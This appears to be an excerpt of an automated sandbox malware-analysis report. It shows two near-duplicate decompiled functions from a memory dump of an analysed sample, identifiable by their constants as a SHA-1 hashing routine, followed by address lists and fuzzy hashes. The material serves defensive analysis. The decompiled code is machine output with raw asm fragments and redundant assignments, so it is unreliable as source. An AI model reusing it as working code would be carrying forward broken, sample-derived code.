                                                                        Function 0040BF7E Relevance: 1.7, Strings: 1, Instructions: 424COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E0040BF7E(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t319;
				signed int _t321;
				signed int _t324;
				signed int _t326;
				signed int _t335;
				signed int _t341;
				signed int _t342;
				signed int _t347;
				signed int _t356;
				signed int _t360;
				signed int _t361;
				signed int _t365;
				signed int _t368;
				signed int _t372;
				signed int _t373;
				signed int _t402;
				signed int _t407;
				signed int _t413;
				signed int _t416;
				signed int _t423;
				signed int _t426;
				signed int _t435;
				signed int _t437;
				signed int _t440;
				signed int _t448;
				signed int _t463;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t474;
				signed int _t482;
				signed int _t483;
				signed int* _t484;
				signed int* _t487;
				signed int _t494;
				signed int _t497;
				signed int _t502;
				signed int _t505;
				signed int _t508;
				signed int _t511;
				signed int _t512;
				signed int _t516;
				signed int _t528;
				signed int _t531;
				signed int _t538;
				void* _t544;
				void* _t546;

				asm("adc [esp-0x3e], ebx");
				_t544 = _t546;
				_t487 = _a4;
				_t356 = 0;
				_t2 =  &(_t487[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t544 + _t356 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t356 = _t356 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t356 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t402 =  *(_t278 - 0x18);
					_t463 =  *(_t278 - 0x14);
					_t360 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t402;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t463;
					_t278[8] = _t360;
					_t319 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t319 ^ _t402;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t360 ^ _t463;
				} while ( *_t46 != 0);
				_t321 =  *_t487;
				_t279 = _t487[1];
				_t361 = _t487[2];
				_t407 = _t487[3];
				_v12 = _t321;
				_v16 = _t487[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t466 = _v8;
					_t494 = _t321 + ( !_t279 & _t407 | _t361 & _t279) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t324 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t407;
					_v12 = _t494;
					asm("rol esi, 0x5");
					_v8 = _t361;
					_t413 = _t494 + ( !_t324 & _t361 | _t279 & _t324) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t497 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t365 = _v12;
					_v8 = _t324;
					_t326 = _v8;
					_v12 = _t413;
					asm("rol edx, 0x5");
					_t285 = _t413 + ( !_t365 & _t497 | _t324 & _t365) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t416 = _v12;
					_v16 = _t497;
					asm("ror ecx, 0x2");
					_v8 = _t365;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t326;
					_t502 = _t285 + ( !_t416 & _t326 | _t365 & _t416) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t361 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t416;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t505 = _t502 + ( !_t361 & _t288 | _t416 & _t361) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t407 = _v8;
					asm("ror ecx, 0x2");
					_t467 = _t466 + 5;
					_t321 = _t505;
					_v12 = _t321;
					_v8 = _t467;
				} while (_t467 < 0x14);
				_t468 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t407;
					_t508 = _t505 + (_t407 ^ _t361 ^ _t279) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t335 = _v12;
					_v12 = _t508;
					asm("rol esi, 0x5");
					_t423 = _t508 + (_t361 ^ _t279 ^ _t335) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t511 = _t279;
					_v16 = _t361;
					_t368 = _v12;
					_v12 = _t423;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t423 + (_t279 ^ _t335 ^ _t368) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t426 = _v12;
					_v8 = _t335;
					_v8 = _t368;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t468 = _t468 + 5;
					_t361 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t511 + 0x6ed9eba1; // 0x6ed9eb9f
					_t512 = _t292 + (_t335 ^ _v8 ^ _t426) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t426;
					_v12 = _t512;
					asm("rol esi, 0x5");
					_t407 = _v8;
					_t505 = _t512 + (_t295 ^ _v8 ^ _t361) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x150)) + _t335 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t505;
				} while (_t468 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t407;
					asm("ror eax, 0x2");
					_t516 = ((_t361 | _t279) & _t407 | _t361 & _t279) +  *((intOrPtr*)(_t544 + _v8 * 4 - 0x14c)) + _t505 + _v16 - 0x70e44324;
					_t474 = _v12;
					_v12 = _t516;
					asm("rol esi, 0x5");
					_t341 = _v8;
					asm("ror edi, 0x2");
					_t435 = ((_t279 | _t474) & _t361 | _t279 & _t474) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x148)) + _t516 + _v16 - 0x70e44324;
					_v16 = _t361;
					_t372 = _v12;
					_v12 = _t435;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t437 = ((_t474 | _t372) & _t279 | _t474 & _t372) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x144)) + _t435 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t474;
					_v12 = _t437;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t528 = ((_t372 | _t299) & _t474 | _t372 & _t299) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x140)) + _t437 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t440 = _t372;
					_t361 = _v12;
					_v8 = _t440;
					_v12 = _t528;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t505 = ((_t299 | _t361) & _t440 | _t299 & _t361) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x13c)) + _t528 + _v16 - 0x70e44324;
					_t407 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t505;
					_t342 = _t341 + 5;
					_v8 = _t342;
				} while (_t342 < 0x3c);
				_t482 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t483 = _v8;
					asm("ror eax, 0x2");
					_t531 = (_t407 ^ _t361 ^ _t279) +  *((intOrPtr*)(_t544 + _t482 * 4 - 0x14c)) + _t505 + _v16 - 0x359d3e2a;
					_t347 = _v12;
					_v16 = _t407;
					_v12 = _t531;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t448 = (_t361 ^ _t279 ^ _t347) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x148)) + _t531 + _v16 - 0x359d3e2a;
					_v16 = _t361;
					_t373 = _v12;
					_v12 = _t448;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t347 ^ _t373) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x144)) + _t448 + _v16 - 0x359d3e2a;
					_t407 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t347;
					_t538 = (_t347 ^ _t373 ^ _t407) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t373;
					_v8 = _t347;
					asm("ror edx, 0x2");
					_v8 = _t373;
					_t361 = _v12;
					_v12 = _t538;
					asm("rol esi, 0x5");
					_t482 = _t483 + 5;
					_t505 = (_t305 ^ _t407 ^ _t361) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x13c)) + _t538 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t407;
					_v12 = _t505;
					_v8 = _t482;
				} while (_t482 < 0x50);
				_t484 = _a4;
				_t484[2] = _t484[2] + _t361;
				_t484[3] = _t484[3] + _t407;
				_t311 = _t484[4] + _v16;
				 *_t484 =  *_t484 + _t505;
				_t484[1] = _t484[1] + _t279;
				_t484[4] = _t311;
				_t484[0x17] = 0;
				return _t311;
			}

































































                                                                        0x0040bf7e
                                                                        0x0040bf84
                                                                        0x0040bf8e
                                                                        0x0040bf92
                                                                        0x0040bf94
                                                                        0x0040bf94
                                                                        0x0040bf97
                                                                        0x0040bfb9
                                                                        0x0040bfdf
                                                                        0x0040c005
                                                                        0x0040c027
                                                                        0x0040c02e
                                                                        0x0040c031
                                                                        0x0040c034
                                                                        0x0040c03d
                                                                        0x0040c043
                                                                        0x0040c04a
                                                                        0x0040c05b
                                                                        0x0040c05e
                                                                        0x0040c061
                                                                        0x0040c065
                                                                        0x0040c067
                                                                        0x0040c069
                                                                        0x0040c072
                                                                        0x0040c075
                                                                        0x0040c078
                                                                        0x0040c083
                                                                        0x0040c089
                                                                        0x0040c08b
                                                                        0x0040c08b
                                                                        0x0040c08e
                                                                        0x0040c091
                                                                        0x0040c091
                                                                        0x0040c096
                                                                        0x0040c098
                                                                        0x0040c09b
                                                                        0x0040c09e
                                                                        0x0040c0a4
                                                                        0x0040c0a7
                                                                        0x0040c0aa
                                                                        0x0040c0b3
                                                                        0x0040c0b9
                                                                        0x0040c0c2
                                                                        0x0040c0d1
                                                                        0x0040c0d8
                                                                        0x0040c0db
                                                                        0x0040c0de
                                                                        0x0040c0e7
                                                                        0x0040c0ea
                                                                        0x0040c0ed
                                                                        0x0040c105
                                                                        0x0040c10c
                                                                        0x0040c10e
                                                                        0x0040c111
                                                                        0x0040c114
                                                                        0x0040c11d
                                                                        0x0040c124
                                                                        0x0040c127
                                                                        0x0040c12a
                                                                        0x0040c139
                                                                        0x0040c140
                                                                        0x0040c143
                                                                        0x0040c146
                                                                        0x0040c14f
                                                                        0x0040c159
                                                                        0x0040c15c
                                                                        0x0040c168
                                                                        0x0040c16b
                                                                        0x0040c172
                                                                        0x0040c175
                                                                        0x0040c178
                                                                        0x0040c17d
                                                                        0x0040c180
                                                                        0x0040c189
                                                                        0x0040c19a
                                                                        0x0040c19d
                                                                        0x0040c1a0
                                                                        0x0040c1a7
                                                                        0x0040c1aa
                                                                        0x0040c1ad
                                                                        0x0040c1b0
                                                                        0x0040c1b2
                                                                        0x0040c1b5
                                                                        0x0040c1b8
                                                                        0x0040c1c1
                                                                        0x0040c1c6
                                                                        0x0040c1c6
                                                                        0x0040c1db
                                                                        0x0040c1de
                                                                        0x0040c1e1
                                                                        0x0040c1e8
                                                                        0x0040c1eb
                                                                        0x0040c1ee
                                                                        0x0040c203
                                                                        0x0040c20a
                                                                        0x0040c20d
                                                                        0x0040c211
                                                                        0x0040c214
                                                                        0x0040c219
                                                                        0x0040c21c
                                                                        0x0040c22b
                                                                        0x0040c22e
                                                                        0x0040c235
                                                                        0x0040c238
                                                                        0x0040c23b
                                                                        0x0040c23e
                                                                        0x0040c241
                                                                        0x0040c249
                                                                        0x0040c257
                                                                        0x0040c25a
                                                                        0x0040c25d
                                                                        0x0040c25d
                                                                        0x0040c264
                                                                        0x0040c267
                                                                        0x0040c26a
                                                                        0x0040c272
                                                                        0x0040c280
                                                                        0x0040c283
                                                                        0x0040c28a
                                                                        0x0040c28d
                                                                        0x0040c290
                                                                        0x0040c293
                                                                        0x0040c296
                                                                        0x0040c29f
                                                                        0x0040c2a6
                                                                        0x0040c2a6
                                                                        0x0040c2ac
                                                                        0x0040c2c5
                                                                        0x0040c2c8
                                                                        0x0040c2cf
                                                                        0x0040c2d2
                                                                        0x0040c2d5
                                                                        0x0040c2e7
                                                                        0x0040c2f1
                                                                        0x0040c2f4
                                                                        0x0040c2fd
                                                                        0x0040c300
                                                                        0x0040c307
                                                                        0x0040c30a
                                                                        0x0040c310
                                                                        0x0040c323
                                                                        0x0040c32a
                                                                        0x0040c32d
                                                                        0x0040c330
                                                                        0x0040c333
                                                                        0x0040c33c
                                                                        0x0040c33f
                                                                        0x0040c352
                                                                        0x0040c355
                                                                        0x0040c35f
                                                                        0x0040c362
                                                                        0x0040c364
                                                                        0x0040c36d
                                                                        0x0040c370
                                                                        0x0040c383
                                                                        0x0040c389
                                                                        0x0040c38c
                                                                        0x0040c393
                                                                        0x0040c395
                                                                        0x0040c398
                                                                        0x0040c39b
                                                                        0x0040c39e
                                                                        0x0040c3a1
                                                                        0x0040c3a4
                                                                        0x0040c3ad
                                                                        0x0040c3b2
                                                                        0x0040c3b5
                                                                        0x0040c3b5
                                                                        0x0040c3c8
                                                                        0x0040c3cb
                                                                        0x0040c3ce
                                                                        0x0040c3d5
                                                                        0x0040c3d8
                                                                        0x0040c3db
                                                                        0x0040c3de
                                                                        0x0040c3f1
                                                                        0x0040c3f4
                                                                        0x0040c3ff
                                                                        0x0040c402
                                                                        0x0040c40e
                                                                        0x0040c411
                                                                        0x0040c417
                                                                        0x0040c41a
                                                                        0x0040c41d
                                                                        0x0040c424
                                                                        0x0040c434
                                                                        0x0040c437
                                                                        0x0040c43d
                                                                        0x0040c440
                                                                        0x0040c447
                                                                        0x0040c449
                                                                        0x0040c44c
                                                                        0x0040c44f
                                                                        0x0040c452
                                                                        0x0040c455
                                                                        0x0040c45c
                                                                        0x0040c46b
                                                                        0x0040c46e
                                                                        0x0040c475
                                                                        0x0040c478
                                                                        0x0040c47b
                                                                        0x0040c47e
                                                                        0x0040c481
                                                                        0x0040c484
                                                                        0x0040c487
                                                                        0x0040c490
                                                                        0x0040c4a1
                                                                        0x0040c4a9
                                                                        0x0040c4af
                                                                        0x0040c4b2
                                                                        0x0040c4b4
                                                                        0x0040c4b7
                                                                        0x0040c4ba
                                                                        0x0040c4c7

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (
                                                                        • API String ID: 0-3887548279
                                                                        • Opcode ID: e58ba757d2cea3cf0aa36510cdc91d77d09d7bc5db60155aab268f2ad3b00527
                                                                        • Instruction ID: 1c13cc515e38273434cd3dc2378e7bf44f33fd2e07e7fb5df5fb5c578cb68f3f
                                                                        • Opcode Fuzzy Hash: e58ba757d2cea3cf0aa36510cdc91d77d09d7bc5db60155aab268f2ad3b00527
                                                                        • Instruction Fuzzy Hash: A9021CB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040BF83 Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 73%
                                                                        			E0040BF83(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                                        0x0040bf8e
                                                                        0x0040bf92
                                                                        0x0040bf94
                                                                        0x0040bf94
                                                                        0x0040bf97
                                                                        0x0040bfb9
                                                                        0x0040bfdf
                                                                        0x0040c005
                                                                        0x0040c027
                                                                        0x0040c02e
                                                                        0x0040c031
                                                                        0x0040c034
                                                                        0x0040c03d
                                                                        0x0040c043
                                                                        0x0040c04a
                                                                        0x0040c05b
                                                                        0x0040c05e
                                                                        0x0040c061
                                                                        0x0040c065
                                                                        0x0040c067
                                                                        0x0040c069
                                                                        0x0040c072
                                                                        0x0040c075
                                                                        0x0040c078
                                                                        0x0040c083
                                                                        0x0040c089
                                                                        0x0040c08b
                                                                        0x0040c08b
                                                                        0x0040c08e
                                                                        0x0040c091
                                                                        0x0040c091
                                                                        0x0040c096
                                                                        0x0040c098
                                                                        0x0040c09b
                                                                        0x0040c09e
                                                                        0x0040c0a4
                                                                        0x0040c0a7
                                                                        0x0040c0aa
                                                                        0x0040c0b3
                                                                        0x0040c0b9
                                                                        0x0040c0c2
                                                                        0x0040c0d1
                                                                        0x0040c0d8
                                                                        0x0040c0db
                                                                        0x0040c0de
                                                                        0x0040c0e7
                                                                        0x0040c0ea
                                                                        0x0040c0ed
                                                                        0x0040c105
                                                                        0x0040c10c
                                                                        0x0040c10e
                                                                        0x0040c111
                                                                        0x0040c114
                                                                        0x0040c11d
                                                                        0x0040c124
                                                                        0x0040c127
                                                                        0x0040c12a
                                                                        0x0040c139
                                                                        0x0040c140
                                                                        0x0040c143
                                                                        0x0040c146
                                                                        0x0040c14f
                                                                        0x0040c159
                                                                        0x0040c15c
                                                                        0x0040c168
                                                                        0x0040c16b
                                                                        0x0040c172
                                                                        0x0040c175
                                                                        0x0040c178
                                                                        0x0040c17d
                                                                        0x0040c180
                                                                        0x0040c189
                                                                        0x0040c19a
                                                                        0x0040c19d
                                                                        0x0040c1a0
                                                                        0x0040c1a7
                                                                        0x0040c1aa
                                                                        0x0040c1ad
                                                                        0x0040c1b0
                                                                        0x0040c1b2
                                                                        0x0040c1b5
                                                                        0x0040c1b8
                                                                        0x0040c1c1
                                                                        0x0040c1c6
                                                                        0x0040c1c6
                                                                        0x0040c1db
